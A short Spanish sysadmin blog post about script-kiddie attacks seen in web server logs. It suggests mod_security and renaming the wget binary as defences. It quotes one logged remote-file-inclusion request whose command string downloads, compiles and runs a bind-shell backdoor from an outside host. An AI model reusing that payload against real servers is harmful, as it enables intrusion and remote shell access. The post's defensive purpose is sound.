Categoría: Seguridad

Cualquiera que tenga un servidor web y revise los logs de acceso podrá comprobar el gran número de ataques con scripts kiddies que se producen a lo largo del día. Intentos de ataque como éste son el pan de cada día para los sysadmin:

XXX.XXX.XXX.XXX – – [10/Jan/2005:23:09:31 -0600] «GET index.php?template=http://geocities.com/s3xmelayu/bc-x.gif?&cmd=cd%20/tmp;
wget%20http://geocities.com/s3xmelayu/bindtty.c;gcc%20-o%20webphp%20bindtty.c;
chmod%20+777%20webphp;rm%20-rf%20bindtty.c;./webphp HTTP/1.1» 200 4308 «-» «Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; DigExt)»

Si usas mod_security para apache la mayoría de estos ataques se quedan en meros intentos, pero no dejan de ser molestos.

Mi compañero CrK01, de NewLight Systems, encontró por fin una solución tan simple como efectiva, basta con renombrar en nuestro sistema el binario «wget» a «baja» y el 80% de estos ataques fracasarán.

DISCLAIMER: Al cambiar el nombre de wget, todos los programas o scripts que hagan uso de éste dejarán de funcionar. No me hago responsable de los posibles fallos que este cambio pueda ocasionar. A mi compañero le funciona sin problemas pero cada sistema es un mundo 🙂